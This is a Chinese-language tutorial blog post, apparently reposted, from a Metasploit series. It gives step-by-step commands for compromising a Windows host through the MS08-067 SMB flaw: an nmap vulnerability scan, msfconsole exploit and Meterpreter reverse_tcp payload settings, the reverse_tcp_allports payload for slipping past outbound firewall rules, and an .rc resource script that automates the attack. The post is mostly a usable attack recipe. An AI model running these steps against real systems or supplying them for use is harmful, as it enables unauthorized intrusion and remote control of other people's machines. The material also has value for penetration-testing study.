metasploit——(三)渗透攻击之旅

以下利用metasploit攻击网站的具体思路:

  1、先判断开放了哪些端口  

    nmap  -sT -A  --script=smb-vuln-ms08-067  -P0 192.167.2.2

  2、根据开放的端口服务,寻找相应的漏洞攻击模块

    search  ms08-067_netapi

    use exploit/windows/smb/ms08-067_netapi

    show payload   寻找适合这个模块的攻击载荷

    set  payload  windows/meterpreter/reverse_tcp

    show  options   查看需要设置哪些参数

    set  LHOST xxxx

    set  RHOST  xxx

    set  LPORT   xx

    exploit    对目标尝试攻击。

    反弹回   meterpreter  shell

  在上面的例子中,我们之所以能够成功,主要是由于目标主机反弹连接使用的端口没有被过滤掉。但是如果我们攻击的组织内部设置了非常严格的出站端口怎么办?我们可以猜测443端口没有被防火墙禁止,同样的可能还有FTP、telnet、ssh等服务使用的端口,可以逐一尝试。。幸运的是,metasploit提供了一个专用的攻击载荷帮助我们找到这些放行的端口。。

下面我们使用这个攻击载荷,让它尝试对所有端口进行连接,直到找到成功连接的端口为止。。

    use exploit/windows/smb/ms08-067_netapi

    set  LHOST xxxx

    set  RHOST  xxx

    set  LPORT   xx

    search ports

    set payload windows/meterpreter/reverse_tcp_allports

    exploit  -j          返回结果会显示出与目标主机的哪个端口建立了连接。。

    session  -l  -v     返回session 的 ID

    session   -i    id号

    最后反弹回   meterpreter

以下是一些其他相关信息:

  资源文件:是msf终端内包含一系列自动化命令的脚本文件。。。

    比如:  echo  use  exploit/windows/smb/ms08_067_netapi  > autoexploit.rc

       echo  set RHOST  1.2.3.2      >> autoexploit.rc

        echo exploit   >> autoexploit.rc  (此处有省略)

       进入msf终端    运行    resource   autoexxploit.rc    回车

        autoexploit.rc文件内的命令就会依次执行。。。。可以大大减少测试和开发的时间。。。

        

原文地址:https://www.cnblogs.com/hdsec/p/9524162.html